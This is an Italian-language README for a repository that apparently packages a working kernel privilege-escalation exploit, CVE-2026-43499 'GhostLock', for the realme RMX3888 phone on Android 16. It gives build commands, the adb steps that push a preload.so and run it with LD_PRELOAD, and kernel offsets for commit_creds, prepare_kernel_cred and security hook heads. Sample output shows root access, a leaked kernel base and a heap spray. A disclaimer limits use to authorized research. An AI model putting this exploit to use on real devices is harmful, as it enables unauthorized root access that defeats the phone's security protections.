
CVE-2026-43499 configurazione dell'exploit per realme RMX3888 (Android 16) - 20 offset del kernel verificati
Questo repository contiene i file di configurazione completi per l'exploit CVE-2026-43499 (GhostLock) che ha come target il dispositivo realme RMX3888. Tutti gli offset del kernel sono stati estratti e verificati dal boot.img del dispositivo.
✓ 20 offset del kernel verificati estratti da vmlinux
✓ Logging in tempo reale con O_SYNC + fsync per la sicurezza in caso di kernel panic
✓ Configurazione specifica per il dispositivo RMX3888
✓ Script di compilazione con un clic con rilevamento automatico dell'NDK
✓ Documentazione completa con guide alla compilazione
ealtime_log.h - Implementazione del logging in tempo reale
ound2_report.md - Rapporto di configurazione (Round 2)
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
Su Windows Git Bash, lo script rileva automaticamente il percorso SDK predefinito utilizzato da Android Studio e dagli strumenti da riga di comando: /c/Android/Sdk/ndk/*.
Nota: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL e COPY_SPLICE_READ utilizzano attualmente fallback compatibili con la compilazione nell'header del target RMX3888. Sostituiscili con gli offset vmlinux RMX3888 verificati prima di fare affidamento sul comportamento a runtime.
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
Gli offset principali riportati di seguito sono stati estratti dal kernel 6.1.141. Consulta la nota precedente per le voci di fallback compatibili con la compilazione che richiedono ancora una verifica specifica per RMX3888.
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
Il modulo di logging in tempo reale integrato fornisce:
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
Consulta BUILD_GUIDE.md per istruzioni dettagliate sulla risoluzione dei problemi, tra cui:
⚠️ AVVERTENZA: questa configurazione è destinata esclusivamente alla ricerca sulla sicurezza autorizzata.
Questa configurazione è fornita esclusivamente per scopi educativi e di ricerca sulla sicurezza.
Questo repository contiene materiali di ricerca sulla sicurezza. Gli autori e i contributori non sono responsabili per qualsiasi uso improprio o danno causato da questo codice. Utilizzalo a tuo rischio e pericolo e solo su dispositivi di tua proprietà o per i quali disponi di esplicita autorizzazione al test.
Generato: 2026-07-23
Versione del Kernel: 6.1.141-android14-11-o-gffc54a6d2287
Verifica degli Offset: 100% (20/20)
Stato: Pronto per la compilazione